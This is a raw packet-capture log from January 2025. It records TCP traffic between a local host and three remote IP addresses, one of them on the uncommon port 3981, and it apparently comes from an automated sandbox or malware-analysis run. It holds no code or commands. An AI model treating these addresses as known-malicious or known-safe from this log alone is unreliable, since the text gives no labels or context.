                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.778356075 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.778454065 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.778878927 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.779047966 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.779098034 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.779098034 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.779577017 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.779725075 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.779725075 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.779768944 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.779818058 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.780397892 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.780622005 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.781102896 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.781295061 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.781295061 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.781393051 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.781876087 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782036066 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782036066 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782058001 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782105923 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782105923 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782330990 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782373905 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782520056 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782520056 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782567024 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782576084 CET44349747109.99.162.14192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782617092 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:14.782740116 CET49747443192.168.11.20109.99.162.14
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:15.874659061 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:16.421295881 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:16.421555996 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:16.425878048 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:16.984705925 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:17.032953024 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:17.579874039 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:17.584477901 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:18.172774076 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:18.173031092 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:18.728558064 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:18.731306076 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.278827906 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.282279968 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.329358101 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.414032936 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.630012035 CET8049750178.237.33.50192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.630276918 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.630399942 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.828646898 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.828824043 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.833167076 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.851737022 CET8049750178.237.33.50192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.851927042 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:19.888803005 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:20.390563965 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:20.438465118 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:20.477762938 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:20.845145941 CET8049750178.237.33.50192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:20.845268011 CET4975080192.168.11.20178.237.33.50
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:20.984890938 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:20.989481926 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:21.576786995 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:21.576992989 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.148546934 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.148603916 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.148718119 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.148832083 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.148936033 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.148955107 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149074078 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149110079 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149230003 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149271965 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149306059 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149425983 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149533033 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149612904 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.149782896 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695461035 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695554018 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695600986 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695660114 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695833921 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695833921 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.695931911 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696008921 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696052074 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696110964 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696178913 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696330070 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696351051 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696383953 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696553946 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696619987 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696687937 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696731091 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696846962 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696866035 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.696955919 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697031975 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697068930 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697189093 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697338104 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697356939 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697423935 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697571039 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697590113 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:22.697869062 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.242827892 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.242928982 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243053913 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243093014 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243160963 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243263006 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243351936 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243417025 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243474007 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243581057 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243612051 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243643999 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243753910 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243866920 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243982077 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244122028 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244136095 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244244099 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244349957 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244363070 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244472980 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244590044 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244689941 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244709015 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244860888 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244863033 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244971991 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245057106 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245059967 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245182037 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245229959 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245341063 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245419025 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245527029 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245563984 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245676994 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245714903 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245764017 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245883942 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245995045 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246052980 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246125937 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246238947 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246267080 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246386051 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246423006 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246478081 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246583939 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246704102 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246732950 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246850967 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246903896 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246942997 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247055054 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247098923 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247219086 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247288942 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247406960 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247442007 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247560978 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247603893 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.297256947 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790009022 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790154934 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790270090 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790297031 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790333986 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790380955 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790437937 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790585995 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790632963 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790632963 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790690899 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790813923 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790920973 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790971994 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791059971 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791148901 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791235924 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791333914 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791377068 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791486025 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791512966 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791634083 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791651964 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791744947 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791827917 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791863918 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.791979074 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792083979 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792165995 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792247057 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792320013 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792335033 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792443037 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792538881 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792577982 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792697906 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792802095 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792859077 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.792902946 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793009996 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793011904 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793138027 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793184996 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793302059 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793380022 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793526888 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793557882 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793591022 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793730974 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793759108 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793823957 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.793970108 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794032097 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794075966 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794188023 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794215918 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794346094 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794426918 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794545889 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794581890 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794641972 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794751883 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794781923 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794898033 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.794900894 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795043945 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795150995 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795224905 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795238972 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795348883 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795403957 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795506001 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795562983 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795613050 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795742035 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795777082 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795855045 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.795968056 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796078920 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796094894 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796180964 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796314955 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796412945 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796416044 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796598911 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796606064 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796736956 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796813011 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796881914 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796960115 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796960115 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.796997070 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.797100067 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.797239065 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.797261953 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.797352076 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.797462940 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.797590971 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.797604084 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.797604084 CET497493981192.168.11.2043.226.229.196
